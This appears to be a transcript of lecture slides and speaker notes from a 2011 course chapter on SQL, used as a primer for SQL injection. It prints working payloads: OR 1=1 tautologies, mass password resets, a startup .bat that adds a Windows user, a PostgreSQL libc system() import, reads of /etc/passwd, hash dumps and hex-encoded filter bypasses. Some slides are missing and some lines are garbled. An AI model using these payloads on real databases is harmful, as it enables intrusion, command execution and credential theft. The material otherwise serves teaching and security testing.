4. Structured Query Language (SQL) SQL was originally developed at IBM in early 1970. Formalized until 1986 by American National Standards Institute (ANSI). We using the SQL standard defined by the International Organization for Standardization (ISO). 2/04/2011 CHAPTER 10 4
5. SQL Queries SQL queries are made up of one or more SQL statements that are effectively instructions for the database server to carry out. it may include a conditional clause to target specific rows in a table(WHERE). The OR and AND operators are used when multiple conditions are to be evaluated. SELECT Statement SELECT * FROM tblUsers ; SELECT * INTO hackerTable FROM tblusers UNION Operator SELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins; SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins 2/04/2011 CHAPTER 10 5
6. SQL Queries (CON..) INSERT Statement INSERT IN TO tblUsers VALUES (5,'john','smith',0); INSERT INTO tblUsers(id, username, password, priv) VALUES (5, 'john','smith',0); UPDATE Statement UPDATE tblUsers SET priv=0 WHERE username = 'sarah‘; DELETE Statement DELETE FROM tblUsers WHERE username = 'admin‘; 2/04/2011 CHAPTER 10 6
7. SQL Queries (CON..) Notes from the Underground… SELECT story FROM news WHERE id=19; SELECT story FROM news WHERE id=19 OR 1=1 ; SELECT story FROM news WHERE id=19 OR 1=2 ; UPDATE tblUsers SET password='letmein' WHEREemailaddress='someuser@victim.com‘; UPDATE tblUsers SET password='letmein' WHERE emailaddress=‘ ’ or 1=1’ ; 2/04/2011 CHAPTER 10 7
8. SQL Queries (CON..) DROP Statement DROP TABLE tblusers; CREATE TABLE Statement CREATE TABLE shoppinglist(item int, name varchar(100)); CREATE TABLE shoppinglist as select * from dba_users; ORDER BY Clause SELECT cost, product FROM orders ORDER BY cost DESC; 2/04/2011 CHAPTER 10 8
9. SQL Queries (CON..) ALTER TABLE Statement ALTER TABLE tblUsers ADD comments varchar(100); ALTER TABLE tblUsers DROP COLUMN comments; ALTER TABLE tblUsers ALTER COLUMN comments varchar(500); GROUP BY Statement SELECT customer,SUM(cost) FROM orders WHERE customer = 'Anthony Anteater‘ GROUP BY customer; 2/04/2011 CHAPTER 10 9
12. SQL Injection Quick Reference most common SQL queries and techniques we will need when exploiting an SQL injection vulnerability identify the database platform. SQL injection cheat sheet 2/04/2011 12 CHAPTER 10
13. Identifying the Database Platform Web server platform and scripting language. IIS + ASP.NET => SQLServer . APACHE + PHP => MySQL . …. Etc. But we need more scientific approach …… 2/04/2011 13 CHAPTER 10
14. Identifying the Database Platform Time Delay Inference is a long-standing method of identifying the database platform. OR .. submitting “heavy queries” designed to consume the processor for a measureable length of time. 2/04/2011 14 CHAPTER 10
15.
16. identify the database For example … if we suspect that the database platform is either Microsoft SQL Server or Oracle ‘ AND ‘ ahmed’ || ‘ali’ = ‘ahmedali’-- ‘ AND ‘ahmed’ + ‘ali’ = ‘ahmedali’-- 2/04/2011 16 CHAPTER 10
17. Combining Multiple Rows only one column and one row can be returned at a time. To bypass this restriction it is possible to concatenate all rows and columns into a single string. 2/04/2011 17 CHAPTER 10
18.
19. Combining Multiple Rows SELECT sys.stragg (distinct username||';') FROM all_users; -- Returns all usernames on a single line 2/04/2011 19 CHAPTER 10
20. Cheat sheets a quick reference of common SQL statements used in SQL injection attacks against ORACLE and MySQL. 2/04/2011 20 CHAPTER 10
21. Cheat Sheet PHP and Ruby on Rails applications. Configuration Information and Schema 2/04/2011 21 CHAPTER 10
23. Attacking the Database Server System Command Execution It is possible to execute operating system commands by creating a malicious script file on the target server SELECT 'system_commands' INTO dumpfiletrojanpath SELECT 'net user x x ' into dumpfile 'c:Documents and SettingsAll UsersStart MenuPrograms Startupattack.bat' 2/04/2011 23 CHAPTER 10
24. Cracking Database Passwords extract user password hashes from the mysql.user table. SELECT concat(user,":",password) FROM mysql.user Password hashes can then be cracked using http://hashcrack.com/ www.openwall.com/john/ Attacking the Database Server 2/04/2011 24 CHAPTER 10
25. Attacking the Database Directly execute code by directly connecting to the MySQL server and creating a user-defined function. we can download a tool to perform this attack Windows: ww.scoobygang.org/HiDDenWarez/mexec.pl Windows:www.0xdeadbeef.info/exploits/raptor_winudf.tgz Attacking the Database Server 2/04/2011 25 CHAPTER 10
26. File Read/Write The MySQL LOAD_FILE function returns a string containing the contents of a specified file. The database user requires the file_priv privilege to invoke this function. SELECT LOAD_FILE('/etc/passwd'); - we can use a tool called SqlDumper to read file contents via blind SQL injection. Attacking the Database Server 2/04/2011 26 CHAPTER 10
30. Attacking the Database Server there are two different types of injection in ORACLE traditional SQL injection only a single SQL statement. PL/SQL injection execute entire PL/SQL blocks. 2/04/2011 30 CHAPTER 10
31. More than 100 Oracle tables contain password information. Sometimes the passwords are available as clear text. Cracking Database Passwords 2/04/2011 31 CHAPTER 10
34. Oracle password hashes can then be cracked using a variety of freely available tools, such as Woraauthbf. John the Ripper. Gsauditor. Checkpwd. Cain & Abel. 2/04/2011 CHAPTER 10 34 Cracking Database Passwords
36. Bypassing Input Validation Filters You can bypass input validation filters that rely on rejecting known bad characters and string literals by encoding your input. Quote Filters The single-quote character (‘) is synonymous with SQL injection attacks. The idea behind this approach is to prevent the attacker from breaking out of quote-delimited data. 2/04/2011 CHAPTER 10 36
38. Quote Filters (con…) Microsoft SQL Server also allows you to build your query within a variable and then call EXEC to execute it. SELECT ‘ABC’ into it via a HEX-encoded string: DECLARE @q varchar(8000) SELECT @q=0x53454c454354202741424327 EXEC(@q) You can use the following Perl script to automatically encode SQL statements using this technique: 2/04/2011 CHAPTER 10 38
40. HTTP Encoding You can sometimes bypass input validation filters that reject known bad characters (often referred to as blacklisting). 2/04/2011 CHAPTER 10 40
44. Troubleshooting SQL Injection Attacks: Table lists some of the common challenges and errors that are frequently encountered when attempting to exploit an SQL injection flaw across various platforms. 2/04/2011 CHAPTER 10 44
51. SQL Injection on Other Platforms. This section is intended to provide a quick reference for other, less commonplatforms, such as PostgreSQL, DB2, Informix, and Ingres. PostgreSQL : Extracting the PostgreSQL Database Configuration Information: 51 2/04/2011 CHAPTER 10
53. Blind Sql injection Function : Attacking the Database Server: PostgreSQL PostgreSQL does not offer a built-in procedure for executing operating system commands it is possible to import functions such as system() from an external .dll or Shared Object (.so) file. System Command Execution: import the system function from the standard UNIX libc library: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6‘,'system' LANGUAGE 'C' STRICT; The system function can then be called by executing the following SQL query: SELECT system('command'); 53 2/04/2011 CHAPTER 10
54. Local File Access: Local files can be read by the superuser account using the following SQL: CREATE TABLE filedata(t text); COPY filedata FROM '/etc/passwd'; -- It is also possible to write local files using the following SQL: CREATE TABLE thefile(evildata text); INSERT INTO thefile(evildata) VALUES ('some evil data'); COPY thefile (evildata) TO '/tmp/evilscript.sh'; Cracking Database Passwords : PostgreSQL passwords are hashed using the MD5 algorithm: select usename||':'||passwd from pg_shadow; 2/04/2011 CHAPTER 10 54
55. DB2 Cheat Sheet : The DB2 database server from IBM is perhaps one of the least popular database platforms to find integrated with a Web application. Extracting the PostgreSQL Database Configuration Information: 55 2/04/2011 CHAPTER 10
57. Informix Cheat Sheet : The Informix database server is distributed by IBM and is not commonly encountered when compared to other database platforms. Extracting the Informix Database Configuration Information: 2/04/2011 CHAPTER 10 57
59. Ingres Cheat Sheet : The Ingres database is an open source database available for all major operating systems.Ingres is one of the least popular databases to find integrated with a Web application. Extracting the Ingres Database Configuration Information: 59 2/04/2011 CHAPTER 10
61. Microsoft Access : Microsoft Access databases do not scale well with enterprise applications, and thereforeare usually encountered only when the application has minimal database requirements. Brett Moore of insomniasec.com has published an excellent paper on SQL injection with Microsoft Access which you can find here: www.insomniasec.com/publications/Access-Through- Access.pdf 2/04/2011 CHAPTER 10 61
62. Resources : SQL Injection White Papers ■ “Advanced SQL Injection” by Victor Chapela: www.owasp.org/index.php/Image:Advanced_SQL_Injection.ppt “Advanced SQL Injection in SQL Server Applications” by Chris Anley: www.ngssoftware.com/papers/advanced_sql_injection.pdf ■ “Buffer Truncation Abuse in .NET and Microsoft SQL Server” by GaryO’Leary-Steele: http://scanner.sec-1.com/resources/bta.pdf ■ “Access through Access” by Brett Moore: www.insomniasec.com/publications/Access-Through-Access.pdf ■ “Time-Based Blind SQL Injection with Heavy Queries” by Chema Alonso: http://technet.microsoft.com/en-us/library/cc512676.aspx SQL Injection Cheat Sheets ■ PentestMonkey.com SQL injection cheat sheets for Oracle, Microsoft SQL Server, MySQL, PostgreSQL, Ingres, DB2, and Informix: http://pentestmonkey.net/cheat-sheets/ ■ Michaeldaw.org SQL injection cheat sheets for Sybase, MySQL, Oracle, PostgreSQL, DB2, and Ingres: http://michaeldaw.org/sql-injection-cheat-sheet/ ■ FerruhMavituna cheat sheets for MySQL, SQL Server, PostgreSQL, and Oracle: http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ ■ FerruhMavituna cheat sheets for Oracle: http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/ 62 2/04/2011 CHAPTER 10
63. SQL Injection Exploit Tools : BSQL Hacker is a relatively new player in the SQL injection exploit world.The tool is a Windows-based GUI application that supports Microsoft SQL Server,Oracle, and MySQL. BSQL Hacker supports blind and error-based SQL injectiontechniques: http://labs.portcullis.co.uk/application/bsql-hacker/ The Sec-1 Automagic SQL injection (SASI) tool is a Microsoft SQL Server exploittool written in Perl: http://scanner.sec-1.com/resources/sasi.zip
65. Solutions Fast Track : Structured Query Language (SQL) Primer: SQL comprises a feature-rich set of statements, operators, and clauses designed to interact with a database server. The most common SQL Statements are SELECT,INSERT, UPDATE, DELETE, and DROP. The majority of SQL injection vulnerabilities occur when user-supplied data is included with the WHERE Clausem portion of a SELECT statement. The UPDATE and DELETE statements rely on a WHERE clause to determine which records are modified or deleted. When injecting SQL into either an UPDATE or a DELETE statement it is important to understand how your input could affect the database. Avoid injecting OR 1=1 or any other condition that returns true into either of these statements.
Editor's Notes
this will be valid for most database platforms. Where necessary I will highlight platform-specific variations to the standard
The primary role of the SELECT statement is to retrieve data from a database and return it to the application or user. Microsoft SQL server also allows you to use SELECT statements to read table data from one table and insert it into another. You use the UNION operator to combine the result sets of two or more SELECT statements. All SELECT statements within the union must return the same number of columns and their data type must be compatible. To permit duplicates and prevent the database from comparing the returned data, use UNION ALL SELECT
use the INSERT statement to insert data into a table . The most significant problem with this approachis that if the table structure is changed (e.g., columns are added or deleted) data could be written to the wrong column. use the UPDATE statement to modify existing data within a database table. all UPDATE statements should include a WHERE clause to indicate which rows should be updated,or all rows are affected.use the DELETE statement to delete rows from a table. all DELETE statements should include a WHERE clause to indicate which rows should be deleted.
use the DROP statement to delete database objects such as tables, views, indexes, users. use the CREATE TABLE statement to create a new table in the current database or schema.INTEGER or INT - A 32-bit signed integer value. Oracle allows you to create a table and populate it with data from another table or view: use the ORDER BY clause to sort the results of a SELECT statement by a specific column
You can use the ALTER TABLE statement to add, delete, or modify a column within an existing table. use the GROUP BY statement when performing an aggregate function such as SUM against a column in a table .
When performing SQL injection attacks you will often need to limit the number of table rows returned by your injected query (e.g., when extracting data via error messages). The syntax for selecting a specific row from a table varies among database platforms. Table details the SQL syntax for selecting the first and fifth rows from the tblUsers table.
محمد صديق يواصل
the single quote character is often filtered or doubled up as a defense mechanism. this strategy fails when the vulnerable user input is a numeric value, and therefore is not delimited using quote characters.
The DUAL Dummy table (as it is sometimes called) is an automatically-generated table assigned to SYS, but accessible to all users. It is useful because it always exists, and has a single row, which is handy for select statements with constant expressions. You could just as easily do this with any other table with a single row, but using DUAL makes it portable among all Oracle installations.Example: SELECT 1+1 FROM DUAL;1+1----------2
In the following example, we have created a variable named @qand placed the query SELECT ‘ABC’ into it via a HEX-encoded string
by encoding your input using exotic encoding standards or via double encoding.
In the Table lists common SQL metacharacters in a number of encoded formats.
